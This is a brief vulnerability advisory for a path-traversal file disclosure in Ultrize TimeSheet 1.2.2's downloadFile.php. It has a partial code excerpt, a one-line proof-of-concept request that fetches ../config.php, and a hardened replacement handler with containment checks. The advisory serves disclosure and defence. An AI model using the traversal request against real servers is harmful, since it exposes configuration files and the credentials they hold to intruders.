Ultrize TimeSheet 1.2.2 readfile() Local File Disclosure Vulnerability

Code page: /actions/downloadFile.php

====
        File not found. ";
        print $fileName;
        print "
        Please make sure your file paths are correct: {$config['upload_dir']}/{$job_id}/{$fileName}
        ";
    }
?>
====

PoC:

/actions/downloadFile.php?fileName=../config.php
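The root cause is that the request-supplied fileName is joined onto {$config['upload_dir']}/{$job_id}/ and handed to readfile() without any containment check, and the error branch additionally echoes the requested name and the full path back to the client. The handler below is an added example of a hardened version, not Ultrize's code or part of the advisory: it reuses the $config['upload_dir'] and $job_id names from the excerpt, assumes job_id arrives as a numeric request parameter, and adds a basename allowlist plus a realpath() containment check.

```php
<?php
// Added example (not Ultrize TimeSheet code). Assumes $config['upload_dir']
// is the upload root from the excerpt and job_id is a numeric request value.

function resolve_upload_path(string $uploadDir, string $jobId, string $fileName): ?string
{
    // Only a bare file name is acceptable: no directory parts, no "." or "..".
    if ($fileName === '' || $fileName !== basename($fileName)
        || $fileName === '.' || $fileName === '..') {
        return null;
    }
    // Assumption: job ids are integers, so anything else cannot carry separators.
    if (!ctype_digit($jobId)) {
        return null;
    }
    $baseReal = realpath($uploadDir);
    if ($baseReal === false) {
        return null;
    }
    $candidate = realpath($baseReal . DIRECTORY_SEPARATOR . $jobId
                          . DIRECTORY_SEPARATOR . $fileName);
    // realpath() resolves symlinks and "..": the result must still lie under the upload root.
    if ($candidate === false || strpos($candidate, $baseReal . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $candidate;
}

$fileName = (string)($_GET['fileName'] ?? '');
$jobId    = (string)($_GET['job_id'] ?? '');
$path = resolve_upload_path($config['upload_dir'], $jobId, $fileName);

if ($path === null || !is_file($path)) {
    http_response_code(404);
    // Do not echo the requested name or the resolved path: it leaks directory layout.
    exit('File not found.');
}

header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . rawurlencode(basename($path)) . '"');
header('Content-Length: ' . (string)filesize($path));
readfile($path);
```

With this check in place the PoC value ../config.php fails the basename test before any filesystem access, and a symlink planted inside the upload directory is rejected by the realpath() prefix comparison.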